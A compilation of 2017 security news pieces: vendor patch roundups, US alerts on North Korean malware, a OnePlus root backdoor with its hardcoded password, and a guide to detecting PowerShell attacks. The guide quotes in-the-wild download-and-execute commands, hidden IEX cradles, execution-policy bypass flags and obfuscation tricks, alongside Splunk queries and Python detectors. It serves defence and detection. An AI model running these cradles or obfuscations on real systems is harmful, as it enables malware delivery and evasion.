Microsoft’s Patch Tuesday updates for November address more than 50 vulnerabilities, including 20 critical flaws affecting the company’s web browsers.

A total of 53 CVE identifiers have been assigned to the security bugs addressed by Microsoft this month. None of them appear to have been exploited in attacks before the company released the patches.

Three of the flaws have already been publicly disclosed. These are a browser memory corruption that can lead to code execution (CVE-2017-11827), an information disclosure issue in ASP.NET (CVE-2017-8700), and an information disclosure bug in Internet Explorer (CVE-2017-11848).

A total of 20 critical vulnerabilities have been addressed this month and they all affect Internet Explorer and/or Edge. The security holes exist due to the way the browsers, particularly the scripting engines they use, handle objects in memory.

The vulnerabilities can be exploited for arbitrary code execution by getting the targeted user to access a specially crafted website via the vulnerable web browser.

These critical flaws were reported to Microsoft by independent researchers and employees of Palo Alto Networks, Qihoo 360, Google, and the UK’s National Cyber Security Centre (NCSC). Many of the security holes were found by the Google Project Zero researcher known as Lokihardt and their details will likely be made public by Google in the upcoming period.

Other vulnerabilities patched this month by Microsoft include important severity denial-of-service (DoS) and privilege escalation bugs in ASP.NET, a Device Guard security feature bypass, information disclosure and security feature bypass issues in Edge, Office memory corruptions, and information disclosure, privilege escalation and DoS flaws in Windows.

Microsoft has also updated Adobe Flash Player components. Adobe has addressed a total of 80 vulnerabilities across nine products, including five critical out-of-bounds read and use-after-free vulnerabilities in Flash Player that can be exploited for remote code execution.

Last month, both Microsoft and Adobe patched zero-day vulnerabilities exploited by threat actors to deliver malware.


SAP Patches Critical Issues With November 2017 Security Updates
15.11.2017 securityweek  Vulnerability
SAP today released its November 2017 set of patches to address 22 vulnerabilities across its product portfolio, including three issues rated Very High priority (Hot News).

The enterprise software maker included 13 patches in this month’s SAP Security Patch Day, plus 9 patches that are updates to previously released security notes.

Three of the security notes address vulnerabilities considered Hot News, one patches a High severity issue, while the remaining 18 security notes address Moderate risk bugs. The highest CVSS score of the patches is 9.1.

This is the first SAP Security Patch Day to include Hot News security notes since April 2017, when one of the patches addressed a Very High priority vulnerability in TREX / BWA that could allow an attacker to execute commands on the affected system.

All three Hot News security notes are updates to previously released notes. One of them was originally patched in September 2016 and is a code injection vulnerability in Text Conversion. Onapsis, a company that specializes in securing SAP and Oracle applications and which reported the vulnerability, explains that SAP updated the security note with additional correction instructions.

The other two flaws were both resolved in September 2017 and represent an information disclosure in SAP Landscape Management (LaMa) 3.0 and an information disclosure in LVM 2.1 and LaMa 3.0. Both bugs result in an attacker being able to access relevant data under certain conditions, Onapsis says.

According to ERPScan, another company that specializes in the security of SAP and Oracle software, 10 Support Package Notes should be added to the aforementioned 22 security notes, for a total of 32 patches (3 Hot News, 2 High, 26 Medium, and 1 Low).

13 of all the patches are updates to previously released notes and 15 of the notes were released after last month’s Security Patch Day but before today, ERPScan says.

SAP resolved 6 implementation flaws this month, 5 XSS bugs, 5 information disclosure issues, 5 missing authorization checks, 3 XML external entity (XXE) flaws, 2 directory traversal bugs, a local command execution, an OS command execution, an XSRF (cross-site request forgery), a clickjacking bug, a privilege escalation flaw, and a log injection issue.

Some of the most dangerous vulnerabilities addressed this month include an implementation flaw (CVSS Base Score: 8) in SAP Management Console, a Cross-Site Scripting (XSS) vulnerability (CVSS Base Score: 6.1) in SAP SAPUI5, and a Cross-Site Scripting (XSS) vulnerability (CVSS Base Score: 6.1) in SAP BusinessObjects Analysis Edition for OLAP.

SAP also resolved a couple of issues impacting SAP Hana, namely an information disclosure vulnerability in SAP HANA Extended Application Services (XS Advanced) and an information disclosure in SAP NetWeaver Instance Agent Service.


U.S. Government Shares Details of FALLCHILL Malware Used by North Korea
15.11.2017 securityweek  BigBrothers
FALLCHILL Malware Used by North Korean Government Hackers is a Fully Functional RAT, DHS Says

The United States Department of Homeland Security (DHS) shared details of a hacking tool they say is being used by a threat group linked to the North Korean government known as “Hidden Cobra.”

The threat actor dubbed by the U.S. government “Hidden Cobra” is better known in the cybersecurity community as Lazarus Group, which is believed to be behind several high-profile attacks, including the ones targeting Sony Pictures, Bangladesh’s central bank, and financial organizations in Poland. Links have also been found between the threat actor and the recent WannaCry ransomware attacks, but some experts are skeptical.

FALLCHILL Malware

A joint alert issued by the DHS and FBI said a remote administration tool (RAT) known as FALLCHILL was used by the North Korean government to hack into companies in the aerospace, telecommunications, and finance sectors. The alert describes FALLCHILL as a “fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies.”

The U.S. Government has been able to identify 83 network nodes in the infrastructure used by the FALLCHILL malware. The alert says that, according to a trusted third party, FALLCHILL uses fake SSL headers for communications. "After collecting basic system information, the backdoor will begin communication with the C&C server using a custom encrypted protocol with the header that resembles TLS/SSL packets," it reads.

In a separate alert issued Tuesday, the DHS and FBI shared a list of Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a variant of the Volgmer Trojan used by the North Korean government. The alert describes Volgmer as a backdoor Trojan “designed to provide covert access to a compromised system.” The DHS says at least 94 static IP addresses were identified as connected to Volgmer's infrastructure, along with dynamic IP addresses registered across various countries.

According to DHS, the North Korea-linked hackers have been using Volgmer malware in attacks against the government, financial, automotive, and media industries since at least 2013.

“DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to North Korean government malicious cyber activity,” the alert states.

The DHS warned that spear phishing appears to be the primary delivery mechanism for Volgmer infections; but added that the Hidden Cobra threat actors also use a suite of custom tools, some of which could also be used to initially compromise a system.

The alert with technical details and IOCs on FALLCHILL is available here. The alert and technical details for the Volgmer Trojan are available here.

In June, US-CERT released a technical alert to warn organizations of distributed denial-of-service (DDoS) attacks conducted by Hidden Cobra.


A Backdoor in OnePlus devices allows root access without unlocking bootloader
15.11.2017 securityaffairs Mobil

An expert discovered a backdoor in OnePlus devices that allows root access without unlocking the bootloader.
More problems for OnePlus owners: this time, experts discovered a backdoor that allows root access without unlocking the bootloader.

Just over a month after OnePlus was caught collecting personally identifiable information on its users, the Chinese smartphone company has been found leaving a backdoor on almost all OnePlus handsets.

The Twitter user who goes by the handle “Elliot Alderson @fs0c131y” (the name of Mr. Robot’s main character) discovered a backdoor in OnePlus devices running OxygenOS that could allow anyone to obtain root access to the handsets.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 8 others
In the onCreate method if the intent is not null the escalatedUp method is called with the parameter enable=true and password=getIntent().getStringExtra("code"). Do you see where I'm going? pic.twitter.com/oa1i1NdlpU

Elliot Alderson @fs0c131y
The escalatedUp method is calling Privilege.escalate(password) and if the result is true, it set the system property persist.sys.adbroot and oem.selinux.reload_policy to 1 pic.twitter.com/92LeBfDPAv

6:39 PM - Nov 13, 2017
Most OnePlus devices, including the OnePlus 2, 3, 3T and the brand-new OnePlus 5, come with a pre-installed diagnostic testing application dubbed EngineerMode.


The app was developed by Qualcomm to help device manufacturers to easily test all hardware components of the devices.

The app is visible in the list of applications installed on the OnePlus devices.

The pre-installed app can be exploited by attackers with physical access to the device to gain root access on the smartphone.

@fs0c131y decompiled the EngineerMode APK and shared it on GitHub; he discovered the ‘DiagEnabled’ activity, which could be opened with the hardcoded password “Angela” to gain full root access on the smartphone, without even unlocking the bootloader.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 8 others
I will find time to make a POC.
But it's not the biggest issue with this app.

Elliot Alderson @fs0c131y
The DiagEnabled, which is a @Qualcomm made activity, is the best class in this EngineerMode APK. Check the methods in this activity: escalatedUp(boolean, string) sounds like a cool thing no 😀? pic.twitter.com/iQFfam6eg6

6:34 PM - Nov 13, 2017

The problem is severe, and OnePlus users must be made aware that root access to the device can nonetheless be obtained with a simple command.


An attacker could abuse this to perform several malicious activities, including the installation of spyware or a bootkit.

The workaround to protect vulnerable OnePlus smartphones is to disable root on the phone by running the following commands in an ADB shell:

setprop persist.sys.adb.engineermode 0
setprop persist.sys.adbroot 0

or by dialing the code *#8011#.
Elliot Alderson plans to release an application to root the OnePlus devices.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 18 others
Awesome! Thanks to @insitusec and the @NowSecureMobile team, we have the password! It's now possible to root an @Oneplus device with a simple intent pic.twitter.com/gN0awYijBv

Elliot Alderson @fs0c131y
I will publish an application on the PlayStore to root your @OnePlus device in the next hours

10:57 PM - Nov 13, 2017
OnePlus is currently analyzing the issue.

Stay tuned!


Adobe Patch Tuesday addresses 80 flaws, 56 bugs in Reader and Acrobat
15.11.2017 securityaffairs Vulnerebility

With today’s Patch Tuesday, Adobe fixed a total of 80 vulnerabilities across 9 products, most of them in Acrobat and Reader, including dozens of RCE issues.
Adobe released patches for a total of 80 vulnerabilities across its products, including Flash Player, Photoshop, Connect, Acrobat and Reader, DNG Converter, InDesign, Digital Editions, Shockwave Player, and Experience Manager products.

Half of the vulnerabilities addressed with the last Adobe Patch Tuesday were discovered by experts of the Chinese firm Tencent.

The highest number of flaws (56) has been fixed in Acrobat and Reader for Windows and Mac. The patches address many critical uninitialized pointer access, use-after-free, buffer access, buffer over-read, buffer overflow, out-of-bounds read/write, improper array index validation, security bypass, type confusion, and untrusted pointer dereference issues that can be exploited for remote code execution.


Adobe fixed five remote code execution vulnerabilities by releasing updates for the Windows, Mac, Linux and Chrome OS versions of Flash Player.

The company also fixed four server-side request forgery (SSRF) and cross-site scripting (XSS) vulnerabilities in Adobe Connect, and implemented a feature to mitigate clickjacking attacks.

Adobe fixed critical code execution issues affecting the Windows and Mac versions of Photoshop CC and Shockwave Player for Windows, and solved a critical memory corruption vulnerability in DNG Converter for Windows.

Adobe addressed six flaws in Digital Editions for Windows, Mac, iOS, and Android that can lead to the disclosure of memory addresses and other sensitive data.

Adobe fixed three vulnerabilities in Experience Manager, including one information disclosure bug rated moderate severity, and addressed a critical remote code execution bug in Adobe InDesign.

According to Adobe, none of the patched vulnerabilities are under active attack.


Go to HELL, PowersHELL : Powerdown the PowerShell Attacks
15.11.2017 securityaffairs Attack

Powerdown the PowerShell Attacks : Harnessing the power of logs to monitor the PowerShell activities
Lately, I have been working on analyzing the PowerShell attacks in my clients’ environments. Based on that analysis and research, I have come up with a few indicators that help detect potential PowerShell attacks in your environment using Windows event logs. First, we will look at how PowerShell is weaponized in the attacks observed in the wild, and then at the detection mechanism.

How PowerShell is used in the attacks
PowerShell is extremely powerful, and attackers have increasingly been using it in their attack methods lately. PowerShell ships by default with the Microsoft Windows OS and hence is readily available on victim machines.

“PowerShell is predominantly used as a downloader”

The most prominent use of PowerShell observed in attacks in the wild is to download a malicious file from a remote location to the victim machine and execute it using commands like Start-Process, Invoke-Item or Invoke-Expression (IEX), or to download the content of the remote file directly into the memory of the victim machine and execute it from there.

Two methods of System.Net.WebClient that are prevalent in live attacks:

- (New-Object System.Net.WebClient).DownloadFile()
- (New-Object System.Net.WebClient).DownloadString()

(New-Object System.Net.WebClient).DownloadFile()

The simplest example of this method is shown in the snapshot below (an experiment one can perform to check the functionality of this method by setting up an HTTP/S server with a program like XAMPP).


In the example shown above, the file is downloaded to disk as evilfile.txt under C:\Users\kirtar_oza\AppData\Roaming, a path obtained from the $Appdata environment variable, and then executed with the “Invoke-Item” command.

Following is an example from one of the attacks in the wild

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://**********.com/***/**.dat', $env:APPDATA + '\***.exe'); Start-Process $env:APPDATA'\***.exe
In the above example, the remote file is downloaded using the .DownloadFile() method and dropped under the user’s AppData directory (via the environment variable), and “Start-Process” is used to execute the dropped binary.

The following are some more examples of the PowerShell downloads and invocation that have been seen in the wild

C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:vlbjkf
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Invoke-Expression $env:imumnj
C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function Bdabgf([String] $hcre){(New-Object System.Net.WebClient).DownloadFile($hcre,''C:\Users\***\AppData\Local\Temp\****.exe'');Start-Process ''C:\Users\****\AppData\Local\Temp\****.exe'';}try{Bdabgf(''http://*****.com/****.png'')}catch{Bdabgf(''http://*****.de/***.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\****\AppData\Local\Temp\*****.bat;Start-Process 'C:\Users\*****\AppData\Local\Temp\******.bat' -WindowStyle Hidden"
(New-object System.net.Webclient).DownloadString()

DownloadString() does not write any file to disk; it copies the content of the remote file directly into the memory of the victim machine. These files are typically malicious scripts that get executed directly in memory via PowerShell’s -Command argument. This technique is widely used to create so-called file-less malware, where the evil script is executed directly in the memory of the victim machine without dropping any file on the hard disk, and it serves to bypass signature-based detection.

The simplest example of this method is shown below.

Here cmd.js is a remote script that starts a calc.exe process on the victim machine without any file touching the disk; it runs from memory. [Note: just write calc.exe in a Notepad file and save it with a .js extension.]

The following snippet is from one of the attacks in the wild

powershell -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('hxxp://******** [.]com/***/**.mdf', $env:APPDATA + '\***.exe'); Start-Process $env:APPDATA'\***.exe';(New-Object System.Net.WebClient).DownloadString('hxxp://nv******[.]com/s.php?id=po**')
In the above example, both methods are used together: DownloadString() is used to fetch content served by a PHP script on the remote host.

PowerShell “flags” to make the operation stealthy
Attackers use a variety of options available in PowerShell to keep their operation as stealthy as possible. The following flags are widely used in attacks and can be used to build our list of Indicators of Compromise (IOCs):

-WindowStyle hidden / -w hidden: makes the PowerShell operation stealthy by hiding the program window from the user

-Exec Bypass (short for -ExecutionPolicy Bypass): bypasses the execution policy (e.g. Restricted) that would otherwise block PowerShell scripts from running

-Command / -c: executes the given commands from the PowerShell terminal

-EncodedCommand / -e / -Enc: passes a Base64-encoded command on the command line

-Nop / -NoProfile: skips the commands in the profile script

Examples of the various flags

You can refer to the example in the previous section to understand the use of the flags -nop -Exec Bypass -Command.

The following are the examples of various flags used by the attackers in the wild

C:\WINDOWS\system32\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://****.com/Updates')
PowerShell -e <encoded input>
PowerShell -Enc <encoded input>
Indicators of Compromise
Now, I will talk about the indicators of compromise that help you detect suspicious PowerShell activity in the environment.

Observe the Parent-Child Relationship for the PowerShell Process
Typically, when we run PowerShell from the Windows Start menu or from its location on disk, it starts under explorer.exe; you can see the parent-child relationship tree using Process Explorer or Process Hacker on your system.

As shown in the screenshot, explorer.exe is the parent process of powershell.exe.

Most of the time in PowerShell attacks, the PowerShell script or commands are launched through a command-line process; therefore, we have usually observed that the parent process of the PowerShell process in attacks in the wild is cmd.exe.

Now, there are legitimate cases where cmd.exe is the parent process of PowerShell as well, for instance an administrator who wants to fire a PowerShell script and launches PowerShell from the command prompt (cmd.exe).

“Therefore, it is important to have a look at the grandparent process as well, i.e. who spawned cmd.exe; that will give you an indication of whether this could be part of an attack.”

So, if the grandparent process is winword.exe, mshta.exe, wscript.exe or wuapp.exe, it is a fair indication that cmd.exe was spawned by a script, and that script is worth a look.

“There are cases where we have observed the PowerShell process being spawned directly by winword.exe; that is a clear indication of suspicious activity that we need to log and investigate.”

This kind of behavior is typically seen in phishing cases where the user opened a Word document with an embedded macro (VBA) that spawns the PowerShell process to download the malicious content from the web.

Therefore, log and pay attention to the PowerShell process if:

- It is spawned by winword.exe (its parent process is winword.exe)

- It is spawned by cmd.exe (its parent process is cmd.exe) and cmd.exe is spawned by one of:

  winword.exe (the grandparent of PowerShell is winword.exe)
  mshta.exe
  wscript.exe
  wuapp.exe
  taskeng.exe

- It is spawned directly by any of the above processes (its parent is mshta.exe, wscript.exe, cscript.exe, wuapp.exe, taskeng.exe, etc.)

Have a look at the following snippet from Process Monitor, which shows the process creation order after the sample script is executed: PowerShell is executed by wscript.exe, so wscript.exe is the parent process of PowerShell, and PowerShell in turn is the parent process of conhost.exe, which spawns calc.exe.


The sample script is below; copy these lines into Notepad, save the file with a .js extension and run it:

// WSH JScript: WScript.Shell.Run launches powershell.exe, which in turn opens calc.exe
var shell = new ActiveXObject("WScript.Shell");
shell.Run("powershell.exe Invoke-Item c:\\windows\\system32\\calc.exe");

The indicators discussed above are indicative and by no means a comprehensive set of relationships, but they are a good starting point from which we can begin logging PowerShell execution in the environment and then focus on the above IOCs to investigate further for any suspicious activity.

Command-lines are king
Many PowerShell attacks can be detected just by monitoring the command-line parameters passed to the PowerShell process. Moreover, those parameters help further investigation by giving cues on where to look next for evidence. For example, if the DownloadFile() method is used, we learn the location on the hard disk where the malicious file may have been dropped and the malicious site it was downloaded from. We can take these clues and investigate further to assess the impact and behavior of the attack.

How can windows security eventlogs help us in detecting the PowerShell attacks?
There are multiple ways to enable logging for PowerShell based on the version of the PowerShell and operating system used.

Today, I am going to talk about the windows event code that will help us to identify the IOCs described above. By just enabling and logging this event id, it is possible to effectively detect the PowerShell attacks.

I am talking about Windows security event ID 4688, Process Creation. Yes, it will generate a lot of events, but with basic filtering we can log and monitor only the events of interest. By default, Process Creation auditing is disabled, so first and foremost we need to enable it via GPO. You can read more on this here.

In addition, it is important to log the command-line parameters passed at process creation. Command-line auditing is available starting with Windows 8.1 and Windows Server 2012 R2; we just need to enable “Include command line in process creation events” under Administrative Templates\System\Audit Process Creation, and roll it out using GPO. You can read more on this here.

Microsoft has also released an update that makes this feature available on its other supported versions, Windows 7, Server 2008 and Server 2008 R2. You can read more on this here and here.

Event ID 4688 gives us three key pieces of information on which SIEM alerts can be built to detect such attacks:

- Which process has been created
- What command-line parameters/arguments were passed at process creation (if any)
- Which process is the parent (Windows 10 / Windows Server 2016 and later include the name of the parent process in the Creator_Process_Name field; previous versions of Windows include only the process ID of the parent in Creator_Process_ID)
I will use Splunk as an example and explain how alerts can be created to detect suspicious PowerShell activity in your environment. I will also mention the caveats associated with the alert.

First of all, we are interested in capturing PowerShell attacks, so we need to monitor the events where powershell.exe is created or spawned. A typical 4688 event looks like the following; it includes the field “New_Process_Name”, which tells us which process was created.

So, we need to pick up those events with the following search:

index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
Next step is to review the command line arguments passed with Powershell Process initiation.

Process_Command_Line gives the command-line parameters passed to the newly created process, i.e. PowerShell. We can create an alert based on the frequently used parameters like -e, -Enc, -WindowStyle, Bypass, -c, -Command etc.

index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (Process_Command_Line="* -c *" OR Process_Command_Line="* -e *" OR Process_Command_Line="* -enc*" OR Process_Command_Line="* -w*" OR Process_Command_Line="*bypass*")
A better option is to create an input lookup list of known suspicious command-line arguments and match against it in your alert.

Starting with Windows 10 and Windows Server 2016, Microsoft has added a field called “Creator Process Name” to Event ID 4688, which gives the name of the parent process. This field helps to create alerts based on suspicious parents.

index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Creator_Process_Name="C:\\Program Files\\Microsoft Office\\Office15\\winword.exe"
index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Creator_Process_Name="C:\\windows\\system32\\mshta.exe"
index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Creator_Process_Name="C:\\windows\\system32\\cmd.exe"
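To show the same parent/grandparent and flag indicators applied outside Splunk, here is an added Python example (my own illustration, not code from the original article). It runs over a handful of constructed 4688 records (made-up PIDs, paths and an example.invalid URL), resolves Creator_Process_ID to an image name where Creator_Process_Name is absent, and reports why each powershell.exe launch was flagged. The function names and the sample data are assumptions for the demo; the field names follow the ones the article uses.

```python
import ntpath
import re

# Constructed sample 4688 (Process Creation) records, reduced to the fields the
# article names. These are NOT real logs; PIDs, paths and the URL are made up.
# Creator_Process_Name exists on Windows 10 / Server 2016 and later; on older
# Windows only Creator_Process_ID is present and must be resolved ourselves.
SAMPLE_EVENTS = [
    {"New_Process_ID": "0x1a4", "Creator_Process_ID": "0x100",
     "New_Process_Name": r"C:\Windows\explorer.exe",
     "Process_Command_Line": "explorer.exe"},
    {"New_Process_ID": "0x2b0", "Creator_Process_ID": "0x1a4",
     "New_Process_Name": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "Process_Command_Line": '"WINWORD.EXE" invoice.docm'},
    {"New_Process_ID": "0x3c8", "Creator_Process_ID": "0x2b0",
     "New_Process_Name": r"C:\Windows\System32\cmd.exe",
     "Process_Command_Line": "cmd.exe /c powershell.exe -nop -w hidden -c IEX "
                             "(new-object net.webclient).downloadstring('http://example.invalid/Updates')"},
    {"New_Process_ID": "0x4d0", "Creator_Process_ID": "0x3c8",
     "New_Process_Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Process_Command_Line": "powershell.exe -nop -w hidden -c IEX "
                             "(new-object net.webclient).downloadstring('http://example.invalid/Updates')"},
    # An administrator opening PowerShell from the Start menu: parent explorer.exe, no flags.
    {"New_Process_ID": "0x5e8", "Creator_Process_ID": "0x1a4",
     "New_Process_Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Process_Command_Line": "powershell.exe"},
    # Windows 10 style record carrying Creator_Process_Name; benign parent, encoded command.
    {"New_Process_ID": "0x6f0", "Creator_Process_ID": "0x1a4",
     "Creator_Process_Name": r"C:\Windows\explorer.exe",
     "New_Process_Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Process_Command_Line": "powershell.exe -EncodedCommand SQBFAFgA"},
]

# Parents / grandparents the article calls out as a fair indication of script-driven launches.
SUSPICIOUS_ANCESTORS = {"winword.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                        "wuapp.exe", "taskeng.exe"}

# Stealth / automation switches from the "flags" section. PowerShell accepts any
# unambiguous prefix of a parameter name, so short and long forms are both listed.
FLAG_RE = re.compile(
    r"(?<![\w-])-(?:e|enc|encodedcommand|c|command|nop|noprofile|"
    r"exec|executionpolicy|w|windowstyle)\b", re.I)
# Download cradles from the first part of the article.
CRADLE_RE = re.compile(r"downloadstring|downloadfile|\biex\b|invoke-expression", re.I)


def image(path):
    """Lower-cased file name of a Windows path (ntpath, so this also runs on Linux)."""
    return ntpath.basename(path).lower()


def index_by_pid(events):
    """Map New_Process_ID -> record. Caveat: Windows reuses PIDs, so on a real host
    key this by (PID, creation time) or a process GUID rather than by PID alone."""
    return {e["New_Process_ID"]: e for e in events}


def ancestors(event, by_pid, depth=2):
    """Return [parent, grandparent] image names for a record, preferring the
    Creator_Process_Name field and falling back to resolving Creator_Process_ID."""
    names, cur = [], event
    for _ in range(depth):
        parent = by_pid.get(cur.get("Creator_Process_ID"))
        if "Creator_Process_Name" in cur:
            names.append(image(cur["Creator_Process_Name"]))
        elif parent is not None:
            names.append(image(parent["New_Process_Name"]))
        else:
            names.append("unknown")
        if parent is None:
            break
        cur = parent
    return names


def analyze(events):
    """Apply the article's indicators to powershell.exe creation records and
    return one finding per record that triggers at least one of them."""
    by_pid = index_by_pid(events)
    findings = []
    for e in events:
        if image(e["New_Process_Name"]) != "powershell.exe":
            continue
        cmd = e.get("Process_Command_Line", "")
        chain = ancestors(e, by_pid)
        reasons = []
        for level, name in zip(("parent", "grandparent"), chain):
            if name in SUSPICIOUS_ANCESTORS:
                reasons.append(f"{level}={name}")
        flags = sorted({m.group(0).lower() for m in FLAG_RE.finditer(cmd)})
        if flags:
            reasons.append("flags=" + ",".join(flags))
        if CRADLE_RE.search(cmd):
            reasons.append("download cradle")
        if reasons:
            findings.append({"pid": e["New_Process_ID"], "ancestors": chain, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["pid"], " <- ".join(f["ancestors"]), "|", "; ".join(f["reasons"]))
```

On the sample data this reports two launches: the Word-macro chain (winword.exe > cmd.exe > powershell.exe with -nop, -w, -c and a download cradle) and the encoded command started from Explorer; the PowerShell opened from the Start menu with no arguments is not reported. The PID map is the weak point in production, since Windows reuses PIDs: key it by creation time or a process GUID, not by PID alone.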
Caveat:
“Unfortunately, PowerShell commands / scripts are easy to obfuscate.”

There are many ways in which PowerShell scripts can be obfuscated. Random variables or string concatenation can be introduced into the PowerShell command line to easily fool a static comparison of command lines against the input lookup (as shown above). The following are a few obfuscation methods that can render our static comparison ineffective.

There is an excellent research article on PowerShell attack methods by Symantec, THE INCREASED USE OF POWERSHELL IN ATTACKS, which includes excellent examples of obfuscation taken from a DerbyCon 2016 talk by Daniel Bohannon on PowerShell obfuscation. The following are a few of the many obfuscation examples discussed in that paper:

Mixed upper- and lower-case letters can be used, as commands are not case sensitive.
Example: (neW-oBjEct system.NeT.WeBclieNT).dOWNloadfiLe

Strings can be concatenated, including from variables, using single or double quotes.
Example: (New-Object Net.WebClient).DownloadString("ht"+'tp://'+$url)

With the exception of the 14 special cases, the escape character ` can be used in front of a character with no change in the result. A similar trick can be used with the escape character ^ when starting PowerShell from cmd.exe.
Example: (new-object net.webclient)."d`o`wnl`oa`dstr`in`g"($url)

Some arguments can be replaced with their numerical representation.
Example: "-window 1" instead of "-window hidden"
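As an added example (not from the article or the Symantec paper), the following Python normalizer undoes the four tricks listed above before a command line is compared against a static indicator list: it lowercases, strips no-op backtick escapes, joins quoted-string concatenations, maps -window 1 back to -windowstyle hidden and expands abbreviated parameter names to one canonical spelling. The function names, the indicator list and the sample command lines (example.invalid) are assumptions for the demo.

```python
import re

# Characters after which a backtick is a real escape (`n, `t, `0, `` ...) and must be
# kept; in front of any other character the backtick is a no-op and is removed.
SPECIAL_ESCAPES = "0abefnrtuv`'\"$#"
BACKTICK_RE = re.compile("`(?![" + re.escape(SPECIAL_ESCAPES) + "])")
# "ht"+'tp://'  ->  "http://'   (joins adjacent string literals)
CONCAT_RE = re.compile(r"""["']\s*\+\s*["']""")
# -window 1, -w hidden, -WindowStyle Hidden ... -> -windowstyle hidden
WINDOW_RE = re.compile(r"(?<![\w-])-w[a-z]*\s+(?:hidden|1)\b")
# Abbreviations PowerShell accepts for its parameters, mapped to one canonical spelling.
ALIASES = [
    (re.compile(r"(?<![\w-])-e(?:nc(?:odedcommand)?)?\b"), "-encodedcommand"),
    (re.compile(r"(?<![\w-])-c(?:ommand)?\b"), "-command"),
    (re.compile(r"(?<![\w-])-nop(?:rofile)?\b"), "-noprofile"),
    (re.compile(r"(?<![\w-])-exec(?:utionpolicy)?\b"), "-executionpolicy"),
]
SMART_QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'"})

# Indicators are matched against the normalized form, so case, backticks,
# concatenation and numeric -window values no longer defeat them.
INDICATORS = {
    "downloadfile": re.compile(r"downloadfile"),
    "downloadstring": re.compile(r"downloadstring"),
    "invoke-expression": re.compile(r"invoke-expression|\biex\b"),
    "encoded command": re.compile(r"-encodedcommand\b"),
    "hidden window": re.compile(r"-windowstyle hidden"),
    "execution policy bypass": re.compile(r"-executionpolicy bypass"),
}


def normalize_powershell(cmd):
    """Canonicalize a PowerShell command line for indicator matching.
    Not a full de-obfuscator: variables, -EncodedCommand payloads and format-string
    tricks are left alone (decode -EncodedCommand separately before lowercasing,
    otherwise the Base64 is destroyed)."""
    s = cmd.translate(SMART_QUOTES).lower()      # 1. case is irrelevant to PowerShell
    s = BACKTICK_RE.sub("", s)                   # 2. drop no-op backtick escapes
    s = CONCAT_RE.sub("", s)                     # 3. join "a"+'b' literal concatenations
    s = s.replace('"', "").replace("'", "")      # 4. quotes add nothing to the indicator text
    s = WINDOW_RE.sub("-windowstyle hidden", s)  # 5. numeric enum value -> name
    for pattern, canonical in ALIASES:           # 6. abbreviated parameter names -> long form
        s = pattern.sub(canonical, s)
    return re.sub(r"\s+", " ", s).strip()


def matching_indicators(cmd):
    """Names of the indicators that fire on the normalized command line."""
    norm = normalize_powershell(cmd)
    return [name for name, pat in INDICATORS.items() if pat.search(norm)]


if __name__ == "__main__":
    for sample in (
        "(neW-oBjEct system.NeT.WeBclieNT).dOWNloadfiLe",
        "(New-Object Net.WebClient).DownloadString(\"ht\"+'tp://'+$url)",
        "(new-object net.webclient).\"d`o`wnl`oa`dstr`in`g\"($url)",
        "powershell -window 1 -nop -e SQBFAFgA",
    ):
        print(normalize_powershell(sample), "->", matching_indicators(sample))
```

Normalizing before the lookup is what makes a static list usable at all: all four obfuscated samples above collapse to the same tokens (downloadfile, downloadstring, -windowstyle hidden, -encodedcommand) that a plain command line would contain. It does not expand variables or decode Base64, so it complements rather than replaces the parent-process indicators.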

However, it is important to monitor PowerShell execution in your environment, and if the command lines are obfuscated, the chances are very high that they are part of an attack. Hence, it is imperative to log Event ID 4688; you may apply a filter to log only PowerShell process creation, and monitor the command-line arguments passed with each PowerShell process creation.

So till next time – KEEP CALM and STAY VIGILANT !!!


US DHS and FBI share reports on FALLCHILL and Volgmer malware used by North Korean Hidden Cobra APT
15.11.2017 securityaffairs BigBrothers

US DHS published the details of the FALLCHILL and Volgmer malware used by the APT group Hidden Cobra, which is linked to the North Korean government.
The US Department of Homeland Security (DHS) published the details of the hacking tool FALLCHILL used by one of the APT groups linked to the North Korean government, tracked as Hidden Cobra (aka Lazarus Group).

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and the experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and has been involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems. Security researchers determined that the North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was also behind other large-scale cyber espionage campaigns against targets worldwide, including Operation Troy, Operation DarkSeoul, and the Sony Pictures hack.

In June, the United States Computer Emergency Readiness Team (US-CERT) issued a technical alert about the activity of the North Korea’s ‘Hidden Cobra’ APT group.

